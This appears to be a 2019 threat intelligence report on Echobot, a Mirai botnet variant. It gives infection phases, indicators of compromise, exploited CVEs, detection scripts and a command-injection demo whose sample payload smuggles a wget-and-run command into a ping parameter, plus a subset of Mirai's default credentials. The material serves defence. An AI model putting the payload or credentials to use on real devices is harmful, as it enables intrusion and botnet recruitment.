Threat Intelligence Report: New Mirai Variant – Echobot

Date: 18th June 2019

Summary

In September 2016, the French cloud hosting company OVH suffered a distributed denial of service (DDoS) attack that peaked at around 1.5 terabits per second. One month later, a second DDoS attack affected much of the US East Coast and left large parts of the internet inaccessible to its users: the Domain Name System (DNS) provider Dyn was targeted by the Mirai botnet with a flood of DNS lookup requests from tens of millions of IP addresses. Websites and services of many international companies, including Amazon, Netflix and Spotify, became unavailable as a result. Between the two attacks, the Mirai source code was posted publicly, which enabled other actors to copy and further develop it and has produced a steady stream of new variants. The number of variants in circulation has also made attribution of individual attacks far more difficult.

In March 2019, researchers identified a new Mirai variant aimed primarily at Internet of Things (IoT) and embedded devices found inside companies. Enterprise devices sit on higher-bandwidth corporate links, so recruiting them increases the attack capacity available to the botnet's operators. The latest sample carries a total of 27 exploits, several of them new to Mirai, which widens the range of devices it can infect.

Because the source code is public, anyone can build their own version: Mirai is now effectively a framework into which botnet authors can quickly add new exploits and functionality. Within two months of the code's release, the number of bot instances more than doubled, from 213,000 to 493,000. Variants that have appeared in the wild since 2016 include Satori, JenX, OMG, Masuta, Wicked and Yowai.

Conclusions

Recent reports show a rise in DDoS activity. During Q1 2019, Link11 (a cloud-based DDoS protection provider) registered 11,177 DDoS attacks on European targets. Several attacks exceeded 100 Gbps, with the peak attack bandwidth reaching 224 Gbps. The mean bandwidth was 3.8 Gbps, an increase of more than 70% over the 2.2 Gbps recorded in the same period of the previous year.

IoT botnets continue to widen the range of devices they can infect, by incorporating multiple exploits for different IoT products, by extending the list of default credentials they brute force, or both. The new Mirai variant continues the effort by Linux malware authors to reach a broader population of devices, so that more of them can be recruited into larger botnets with greater firepower for DDoS attacks.

Tactics, Techniques and Procedures

2016 was not the first time an IoT botnet appeared. Mirai-like predecessors have existed since 2014, among them Bashlite, Gafgyt, QBot, Remaiten and Torlus. Mirai built on improved code from these forerunners and was the work of several developers. It was completed in 2016, and its operators used it to slow down or knock offline game servers, including Minecraft servers, which cost the servers' operators a lot of money.

Mirai scans the internet for IoT devices running a stripped-down Linux (typically BusyBox-based) on embedded processors; it ships binaries for a range of architectures, including ARM, MIPS, x86, PowerPC and SPARC, so that it can run on whatever it finds. If the default username and password have not been changed, Mirai logs into the device and infects it. Although the original creators were caught, the source code remains public and new variants such as Okiru, Satori and Masuta have evolved from it. One variant, OMG, turns infected IoT devices into proxies, which lets criminals route their traffic through them and remain anonymous.

The Mirai botnet comprises four major components. The bot (1) is the malware that infects devices; its twofold aim is to propagate the infection to other misconfigured devices and to attack a target as soon as it receives the corresponding command from the person controlling the botnet (the botmaster). The command and control (C&C) server (2) provides the botmaster with a centralised management interface used to check the botnet's condition and orchestrate new DDoS attacks; the botmaster typically reaches it and the rest of the infrastructure over the anonymising Tor network. The loader (3) connects to newly found victims and delivers the executable built for each victim's platform. Finally, the report server (4) maintains the database of all devices in the botnet and the credentials used to reach them.

Phase One: Reconnaissance. Mirai first scans random public IP addresses on TCP ports 23 and 2323 by sending asynchronous, stateless TCP SYN probes to pseudorandom IPv4 addresses, skipping ranges in a hard-coded blacklist (private and reserved ranges plus several US government and corporate blocks), which reduces the chance of attracting attention. The scan looks for devices with Telnet exposed (the original Mirai did not attack SSH; some later variants added it) and, for each host that answers the probe, the bot moves on to the login attempts of the next phase.

Phase Two: Brute Force. Against each responding host, the bot attempts to establish a Telnet session using username and password pairs selected at random from a pre-configured list of 62 credentials, the factory defaults of many IoT devices. On a successful login, the bot sends the victim's IP address, port, the working credentials and other characteristics of the device to the report server, on a port separate from the C&C channel. The bot does not infect the device itself; that is left to the loader.

Phase Three: Command & Control. Using the C&C server, the botmaster checks the botnet's current status and the list of new victims by querying the report server, usually over Tor. Once the botmaster has decided which devices to infect, an "infect" command is issued to the loader with the necessary details, including the victim's IP address, credentials and hardware architecture. The loader then logs into the target device and instructs it to download and execute the malware binary compiled for that architecture.

Phase Four: Execution. When the malware executes it first protects itself from rival malware by closing the points of intrusion it used itself: it kills the processes listening on the Telnet and Secure Shell (SSH) ports (and the device's web server port) so that other bots cannot take the device over. To retrieve attack commands, the new bot contacts the C&C server by resolving a domain name hardcoded in the executable rather than a static IP address; this lets the botmaster move the C&C server to a new IP address over time without modifying the binary and without extra communication to the bots. From there the botmaster instructs all bot instances to attack a target by issuing a single command through the C&C server, and the bots launch it using one of several attack methods, including TCP and HTTP flooding and Generic Routing Encapsulation (GRE) floods.
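The four phases above leave two network-visible signatures that a defender can hunt for: one source sending SYNs to TCP 23/2323 on many unrelated hosts (Phase One) and Telnet logins that walk the hard-coded credential dictionary (Phase Two). The following is an added example, not code from the report or from Mirai, that runs that detection logic over constructed firewall and Telnet honeypot log lines; the log formats, the sample addresses and the thresholds are assumptions, and the credential set is a subset of the 62 pairs in the released Mirai source.

```python
"""Detect Mirai-style Telnet scanning and dictionary brute force in
connection and honeypot logs. Added example (not code from the report);
the log formats and sample lines below are constructed for illustration."""
from collections import defaultdict

# Subset of the 62 hard-coded credential pairs in the released Mirai
# source; a real deployment would load the full list.
MIRAI_CREDENTIALS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"),
    ("admin", "admin"), ("root", "888888"), ("root", "xmhdipc"),
    ("root", "default"), ("root", "juantech"), ("root", "123456"),
    ("support", "support"), ("root", "54321"),
}
TELNET_PORTS = {23, 2323}

# Constructed firewall log: "src_ip dst_ip dst_port tcp_flags"
FIREWALL_LOG = """\
198.51.100.7 203.0.113.10 23 S
198.51.100.7 203.0.113.44 23 S
198.51.100.7 203.0.113.91 2323 S
198.51.100.7 203.0.113.120 23 S
198.51.100.7 203.0.113.131 23 S
198.51.100.7 203.0.113.200 23 S
192.0.2.55 203.0.113.10 443 S
192.0.2.55 203.0.113.10 443 S
"""

# Constructed Telnet honeypot log: "src_ip username password result"
HONEYPOT_LOG = """\
198.51.100.7 root xc3511 fail
198.51.100.7 root vizxv fail
198.51.100.7 admin admin fail
198.51.100.7 root 888888 success
192.0.2.9 alice correct-horse fail
"""


def telnet_scanners(log: str, min_targets: int = 5) -> dict:
    """Return {src_ip: distinct_targets} for sources that sent SYNs to at
    least min_targets different hosts on Telnet ports: the footprint of
    Mirai's stateless scanner hitting pseudorandom addresses."""
    targets = defaultdict(set)
    for line in log.splitlines():
        src, dst, port, flags = line.split()
        if int(port) in TELNET_PORTS and flags == "S":
            targets[src].add(dst)
    return {src: len(t) for src, t in targets.items() if len(t) >= min_targets}


def mirai_bruteforcers(log: str, min_hits: int = 3) -> dict:
    """Return sources whose Telnet logins used at least min_hits pairs from
    the Mirai dictionary, together with any pair that succeeded (a success
    means the device should be treated as reported to a report server)."""
    hits = defaultdict(list)
    compromised = {}
    for line in log.splitlines():
        src, user, password, result = line.split()
        if (user, password) in MIRAI_CREDENTIALS:
            hits[src].append((user, password))
            if result == "success":
                compromised[src] = (user, password)
    return {src: {"attempts": len(h), "success": compromised.get(src)}
            for src, h in hits.items() if len(h) >= min_hits}


if __name__ == "__main__":
    print("scanners:", telnet_scanners(FIREWALL_LOG))
    print("brute force:", mirai_bruteforcers(HONEYPOT_LOG))
```

The scanner check keys on distinct destinations rather than packet counts because Mirai probes each address once and moves on; a single busy client retrying one server (192.0.2.55 above) never trips it. The honeypot check treats a successful login with a dictionary pair as the priority alert, since the next step in the chain is the loader connecting in.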

Echobot. Echobot evolved from Mirai and is built on the same source code, but it targets flaws in enterprise products. On top of the default-credential attack that Mirai relies on, Echobot keeps expanding its exploit arsenal in order to cast a wider net than its predecessors and reach systems found inside businesses. Where Mirai preyed on default credentials in consumer IoT devices, Echobot and similar variants are moving into the enterprise space, and they also look further back in time for long-forgotten flaws (the CVE list below includes vulnerabilities published in 2009) that remain exploitable on unpatched equipment. Researchers have found more than 20 distinct exploits in Echobot, all used as infection vectors; most are command injection through unsanitised parameters in device web interfaces. In effect Echobot bolts exploit modules onto Mirai's source code and uses vulnerabilities in enterprise web and networking software to infect new hosts and propagate.
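Most of the CVEs in the list below share one root cause: a device web interface pastes a request parameter into a shell command line, so metacharacters such as ";" turn a "ping this address" diagnostic into arbitrary command execution as root. The following added example (not vendor code, and not from the report) shows a hypothetical CGI-style ping handler in that vulnerable shape beside its hardened form; the parameter name ping_ipaddr is borrowed from the CVE descriptions, the handler itself is invented for illustration. The vulnerable version returns the command string it would hand to the shell instead of running it, so the injected second command can be inspected safely.

```python
"""Shell-metacharacter command injection in an embedded 'diagnostic ping'
CGI handler, next to a hardened version. Added example: the handler is
hypothetical, not code from any of the listed products; only the parameter
name ping_ipaddr is borrowed from the CVE descriptions."""
import ipaddress
import shlex
import subprocess


def vulnerable_ping_command(ping_ipaddr: str) -> str:
    """Build the command line a vulnerable handler would pass to system().
    Returned rather than executed so the injection can be inspected."""
    return "ping -c 3 " + ping_ipaddr


def shell_commands(cmdline: str) -> list:
    """Tokenise a command line the way sh does and split it into the separate
    commands the shell would run. Models ';', '&&', '||' and '|' only;
    backticks and $() are further injection routes this does not model."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok in (";", "&&", "||", "|"):
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def safe_ping_argv(ping_ipaddr: str) -> list:
    """Hardened form: validate the input as an IP address (IPv4 or IPv6)
    and pass it as a single argv element, so no shell ever parses it."""
    try:
        addr = ipaddress.ip_address(ping_ipaddr.strip())
    except ValueError:
        raise ValueError("rejected ping_ipaddr: %r" % ping_ipaddr)
    return ["ping", "-c", "3", str(addr)]


def safe_ping(ping_ipaddr: str) -> subprocess.CompletedProcess:
    """Run the validated command without a shell (a list argv with the
    default shell=False) and with a timeout so the handler cannot hang."""
    return subprocess.run(safe_ping_argv(ping_ipaddr), capture_output=True,
                          text=True, timeout=10)


if __name__ == "__main__":
    payload = "127.0.0.1; wget http://198.51.100.7/bot -O /tmp/b; sh /tmp/b"
    print(shell_commands(vulnerable_ping_command(payload)))
    print(safe_ping_argv("127.0.0.1"))
    try:
        safe_ping_argv(payload)
    except ValueError as err:
        print(err)
```

Two things make the hardened handler safe rather than merely filtered: the input must parse as an IP address (an allow-list, not a blacklist of characters), and the value is passed as one argv element so there is no shell to interpret it even if validation were loosened. If a product has to accept hostnames as well, keep the no-shell execution and validate against a strict hostname grammar instead.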

Indicators of Compromise

IP Addresses
  • 185[.]25[.]51[.]115 – two detections in 2019 (VirusTotal); used as a C&C server in the past
  • 93[.]158[.]216[.]170 – one detection in 2019 (VirusTotal); blacklisted once (IPVoid); used in the past to host a C&C server
  • 46[.]166[.]185[.]34 – associated with malicious activity, many detections in 2019 (VirusTotal); used as a C&C server in the past
  • 45[.]119[.]127[.]190 – associated with malicious activity, many detections in 2019 (VirusTotal); used to host a C&C server in the past
URLs
  • http[:]//cnc[.]disabled[.]racing/ – four detections (VirusTotal); classed as malicious by Zscaler
  • fucklua[.]fbisupport[.]com – three detections (VirusTotal); classed as malicious by Zscaler
  • im[.]lateto[.]work – four detections (VirusTotal); classed as malicious by Zscaler
  • imscaredaf[.]xyz – four detections (VirusTotal); classed as malicious by Zscaler
  • network[.]santasbigcandycane[.]cx – three detections (VirusTotal); classed as malicious by Zscaler
  • netwxrk[.]org – four detections (VirusTotal); classed as malicious by Zscaler
  • new[.]swinginwithme[.]ru – three detections (VirusTotal); classed as malicious by Zscaler
  • report[.]laatmaarzittenjoh[.]cf – three detections (VirusTotal); classed as malicious by Zscaler
  • report[.]santasbigcandycane[.]cx – four detections (VirusTotal); classed as malicious by Zscaler
  • report[.]xf0[.]pw – four detections (VirusTotal); classed as malicious by Zscaler
  • youre[.]lateto[.]work – three detections (VirusTotal); classed as malicious by Zscaler
  • http[:]//cmdmirai[.]tk/ – one detection (VirusTotal); classed as malicious by Zscaler
  • http[:]//cnc[.]mirai[.]com/ – one detection (VirusTotal); classed as malicious by Zscaler
  • http[:]//iotmirai[.]tk/ – one detection (VirusTotal); classed as malicious by Zscaler
  • http[:]//miraibotnet[.]ml/ – three detections and an association with malicious shell scripts (VirusTotal); classed as malicious by Zscaler
  • http[:]//miraibotnet[.]online/ – four detections (VirusTotal); classed as malicious by Zscaler
  • http[:]//miraihoneypot[.]tk/ – two detections (VirusTotal); classed as malicious by Zscaler
  • mirainet[.]ml – several detections relating to file downloads (VirusTotal); classed as malicious by Zscaler
  • mirainet[.]tk – several detections relating to file downloads (VirusTotal); classed as malicious by Zscaler
CVEs exploited (CVE – affected product and flaw)
  1. CVE-2009-0545 – ZeroShell: remote attackers can execute arbitrary commands via shell metacharacters passed to cgi-bin/kerbynet
  2. CVE-2009-5156 – ASMAX AR-804gu 66.34.1: command injection via the cgi-bin/script query string
  3. CVE-2009-5157 – Linksys WAG54G2 1.00.10: authenticated command injection via shell metacharacters
  4. CVE-2009-2765 – DD-WRT 24 sp1: httpd.c in the management GUI allows remote attackers to execute arbitrary commands via shell metacharacters
  5. CVE-2010-5330 – Ubiquiti Nanostation5 (AirOS): command injection via a GET request to stainfo.cgi
  6. CVE-2013-7471 – D-Link routers: UPnP SOAP command injection via shell metacharacters in the NewInternalClient, NewExternalPort or NewInternalPort element of a SOAP POST request
  7. CVE-2013-5758 – Yealink VoIP phone SIP-T38G: remote command execution
  8. CVE-2014-8361 – Realtek SDK: the SOAP (miniigd) service allows remote attackers to execute arbitrary code via a crafted NewInternalClient request
  9. CVE-2016-6255 – Portable UPnP SDK (libupnp) before 1.6.21: remote attackers can write arbitrary files into the webroot via a POST request to a URL without a registered handler
  10. CVE-2016-10760 – Seowon Intech routers: command injection in diagnostic.cgi via shell metacharacters in the ping_ipaddr parameter
  11. CVE-2017-18377 – Wireless IP Camera (P2P) WIFICAM cameras: command injection in set_ftp.cgi via shell metacharacters in the pwd variable
  12. CVE-2017-5173 – Geutebruck IP camera G-Cam/EFD-2250 1.11.0.12: improper neutralisation of special elements in an OS command; an attacker can supply parameters that reach the root-level operating system, giving remote code execution
  13. CVE-2017-14135 – OpenDreambox 2.0.0: remote attackers can execute arbitrary OS commands via shell metacharacters
  14. CVE-2018-20841 – HooToo TripMate Titan HT-TM05 and HT-05 routers: remote command execution via shell metacharacters
  15. CVE-2018-6961 – VMware NSX SD-WAN Edge: command injection in the local web UI component; successful exploitation gives remote code execution
  16. CVE-2018-11510 – ASUSTOR NAS portal: unauthenticated remote code execution
  17. CVE-2018-15887 – ASUS Wireless-N300 ADSL modem router: authenticated remote command execution, allowing arbitrary OS commands via shell metacharacters in service parameters
  18. CVE-2018-7841 – Schneider Electric U.motion Builder: SQL injection that can lead to remote code execution when an improper set of characters is entered
  19. CVE-2018-11138 – Quest KACE System Management Appliance: an endpoint accessible to anonymous users can be abused to execute arbitrary commands on the system
  20. CVE-2018-14933 – NUUO NVRmini devices: remote command execution via shell metacharacters
  21. CVE-2018-17173 – LG SuperSign CMS: remote attackers can execute arbitrary code
  22. CVE-2019-3929 – Crestron AM-100 and AM-101, Blackbox HD, Barco WePresent WiPG-1000P: command injection that lets a remote, unauthenticated attacker execute operating system commands as root
  23. CVE-2019-2725 – Oracle WebLogic Server (Oracle Fusion Middleware): easily exploitable flaw that lets an unauthenticated attacker with HTTP network access take over the WebLogic server
  24. CVE-2019-12780 – Belkin Wemo Enabled Crock-Pot: command injection in the Wemo UPnP API via the SmartDevURL argument to the SetSmartDevInfo action; a simple POST request executes commands without authentication
Mirai and Echobot Hashes (SHA-256)
bf10c37ea0c8db49754ac6a0040a601ed425d5ad4d7c8e0ff764cc29037d1b57
65de6303edb13128c26b34b3d3f1a5b78f19302f0c3822b5f82573c045d96c78
c483618671766847fc75ea79fdc201df2e4a93f501dc98ec9c6f283fb1d4336c
930486713426db5072600c504427ea37f108ee2cee7c7c289866164a83f3f356
c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f
62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6
1bf953862e0ba56144f3469a7915d9e25737a7a75d4d8e64753c9e4ecac96cfc
ded9c77a46726c8dcebbbe0cf945b6c97e17728aa6ddc1d28dfad300371fa921
d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89
2238c81031ca78f4df121c94e1fca5368099b6003c30fef83768fef65ce09e9f
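The indicators above are published defanged ("[.]" for ".", "[:]" for ":") so they cannot be clicked by accident; to be useful they have to be refanged and matched against logs. The following added example (not part of the report) does that for a subset of the IP, URL and hash indicators copied from the lists above: it normalises them, then matches DNS queries (including subdomains of a listed name), outbound connections and observed SHA-256 values. The log line formats, the internal client addresses and the benign comparison entries are constructed for the example.

```python
"""Match the indicators published above against DNS, connection and file
hash logs. Added example, not part of the report. The IOC values are copied
from the lists above; the log formats and sample log lines are constructed."""
import re

# Defanged indicators exactly as published above (a subset).
DEFANGED_IOCS = """\
185[.]25[.]51[.]115
46[.]166[.]185[.]34
http[:]//cnc[.]disabled[.]racing/
Report[.]santasbigcandycane[.]cx
Netwxrk[.]org
http[:]//miraibotnet[.]ml/
"""
HASH_IOCS = {
    "bf10c37ea0c8db49754ac6a0040a601ed425d5ad4d7c8e0ff764cc29037d1b57",
    "c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f",
}

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def refang(ioc: str) -> str:
    """Reverse the defanging used above: '[.]' -> '.', '[:]' -> ':', then
    strip any scheme and trailing slash and lower-case the result."""
    s = ioc.strip().replace("[.]", ".").replace("[:]", ":")
    s = re.sub(r"^hxxps?://|^https?://", "", s, flags=re.IGNORECASE)
    return s.rstrip("/").lower()


def load_iocs(text: str):
    """Split refanged indicators into an IP set and a domain set."""
    ips, domains = set(), set()
    for line in text.splitlines():
        if line.strip():
            value = refang(line)
            (ips if IPV4.fullmatch(value) else domains).add(value)
    return ips, domains


def domain_matches(qname: str, domains: set) -> bool:
    """True if the queried name is a listed indicator or a subdomain of one.
    Only the listed FQDNs are matched, not their parent zones, so other
    hosts under a shared parent domain are not flagged by accident."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


# Constructed logs. DNS: "timestamp client query qname type";
# connections: "timestamp client -> dst_ip:port".
DNS_LOG = """\
2019-06-18T10:01:02 10.0.0.12 query cnc.disabled.racing A
2019-06-18T10:01:05 10.0.0.12 query www.example.com A
2019-06-18T10:02:11 10.0.0.40 query report.santasbigcandycane.cx A
2019-06-18T10:03:00 10.0.0.41 query NETWXRK.ORG. A
"""
CONN_LOG = """\
2019-06-18T10:01:03 10.0.0.12 -> 185.25.51.115:23
2019-06-18T10:01:20 10.0.0.12 -> 93.184.216.34:443
"""
# SHA-256 values seen on endpoints: one from the list above, one benign
# (the digest of an empty file).
OBSERVED_HASHES = {
    "bf10c37ea0c8db49754ac6a0040a601ed425d5ad4d7c8e0ff764cc29037d1b57",
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}


def match_logs(dns_log, conn_log, observed_hashes,
               ioc_text=DEFANGED_IOCS, hash_iocs=HASH_IOCS):
    """Return a list of (source, host, indicator) hits across the inputs."""
    ips, domains = load_iocs(ioc_text)
    hits = []
    for line in dns_log.splitlines():
        _ts, host, _verb, qname, _qtype = line.split()
        if domain_matches(qname, domains):
            hits.append(("dns", host, qname.lower().rstrip(".")))
    for line in conn_log.splitlines():
        _ts, host, _arrow, dst = line.split()
        dst_ip = dst.rsplit(":", 1)[0]
        if dst_ip in ips:
            hits.append(("conn", host, dst_ip))
    for digest in sorted(set(observed_hashes) & {h.lower() for h in hash_iocs}):
        hits.append(("hash", None, digest))
    return hits


if __name__ == "__main__":
    for hit in match_logs(DNS_LOG, CONN_LOG, OBSERVED_HASHES):
        print(hit)
```

A DNS hit is the most valuable of the three because Phase Four resolves the C&C name before any connection is made, so it fires even after the C&C IP has moved; the IP matches below it age quickly for exactly that reason. Matching on the listed FQDN rather than the registered domain is deliberate: the Historical Artefacts section shows other hosts under disabled[.]racing that are now classed benign.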

Historical Artefacts

This section lists known IOCs that were detected in the past and used either to distribute malicious content or to host C&C servers. They have since gone inactive or been reclassified as 'benign'.

IP Addresses
  • 192[.]227[.]222[.]73 – now zero detections (VirusTotal), but used in the past to host a C&C server
  • 192[.]227[.]222[.]74 – now zero detections (VirusTotal), but used in the past to host a C&C server
  • 192[.]227[.]222[.]75 – now zero detections (VirusTotal), but used in the past to host a C&C server
  • 192[.]227[.]222[.]76 – now zero detections (VirusTotal), but used in the past to host a C&C server
  • 118[.]89[.]41[.]125 – zero detections (VirusTotal) and not blacklisted, but used to host a C&C server in the past
  • 54[.]187[.]144[.]227 – past detections mainly relating to file downloads (VirusTotal); no detections in 2019 but blacklisted once (IPVoid); used for a C&C server in the past
  • 46[.]183[.]223[.]229 – last detected towards the end of 2018 (VirusTotal); no detections in 2019, but used as a C&C server in the past
  • 35[.]162[.]249[.]35 – zero detections (VirusTotal); blacklisted once (IPVoid); used as a C&C server in the past
  • 5[.]249[.]154[.]190 – zero detections (VirusTotal); blacklisted once (IPVoid); used as a C&C server in the past
  • 188[.]166[.]65[.]12 – blacklisted (IPVoid) by at least one vendor but zero detections (VirusTotal); used in the past to host a C&C server
  • 188[.]166[.]189[.]189 – blacklisted (IPVoid) by at least one vendor but zero detections (VirusTotal); used in the past to host a C&C server
  • 208[.]146[.]44[.]1 – last detected in 2018, no detections in 2019 (VirusTotal); used in the past for a C&C server
URLs
  • http[:]//dongs[.]disabled[.]racing/ – one detection (VirusTotal); classed as benign by Zscaler
  • http[:]//gay[.]disabled[.]racing/ – two detections (VirusTotal); classed as benign by Zscaler
  • kankerc[.]queryhost[.]xyz – two detections (VirusTotal); classed as benign by Zscaler
  • lol[.]disabled[.]racing – two detections (VirusTotal); classed as benign by Zscaler
  • penis[.]disabled[.]racing – two detections (VirusTotal); classed as benign by Zscaler
  • report[.]disabled[.]racing – three detections (VirusTotal); classed as benign by Zscaler
  • report[.]queryhost[.]xyz – two detections (VirusTotal); classed as benign by Zscaler

Advice

The nature of bots and botnets requires specific awareness and attention from businesses and security professionals. The Echobot variant of Mirai targets network-attached storage devices, routers, IP cameras, IP phones, network video recorders and wireless presentation systems, and then looks to propagate across the enterprise network. The following advice will help in defending against bots and botnets.

  • Use intrusion detection (IDS) or intrusion prevention (IPS) monitoring. IDS and IPS sensors on the internal network can identify the Telnet scanning, credential brute forcing and exploit traffic described above and, in the case of IPS, block it.
  • Block unsolicited inbound traffic at the perimeter firewall, and do not expose device management interfaces (Telnet, SSH, web UIs, UPnP) to the internet. Mirai-style bots find victims by scanning for exposed services, so an internet-reachable device with default credentials or an unpatched web UI is the primary infection vector. Note that an infected device connects out to the C&C server, so inbound filtering alone does not cut off control; restrict outbound traffic from IoT segments to what those devices actually need.
  • Block outbound traffic on TCP port 25. Only known mail servers should be allowed to send SMTP traffic out of the network. Blocking outbound SMTP from other sources can limit the spread of malware threats and prevents devices on the internal network from being used as spam distribution points.
  • Run up-to-date antivirus software. Known bot threats can be detected and removed by antivirus products; regular scans with up-to-date signatures locate and remove most bot infections on hosts that can run endpoint software. Most IoT devices cannot, so for them rely on network monitoring and patching.
  • Implement filters at the email gateway. Filter out emails with known malspam indicators and block suspicious IP addresses at the firewall.
  • Educate and train employees on social engineering and phishing (for example, do not open suspicious emails or click on the links they contain).
  • If there is no policy regarding suspicious emails, consider creating one and specify that all suspicious emails are to be reported to the security and/or IT departments.
  • Improve security policies and procedures for all devices, especially IoT devices, as these are the main attack vector: change default credentials before deployment, disable Telnet where possible and segment IoT devices from the rest of the network.
  • Keep systems patched. Echobot carries a long list of exploits that it uses to propagate and compromise vulnerable systems; patched systems give it less opportunity for infection.
  • Be aware of old vulnerabilities. Echobot targets equipment that may still be in service but whose vulnerabilities (some dating from 2009, see the CVE list above) have long been forgotten; inventory such devices and retire or isolate those that can no longer be patched.
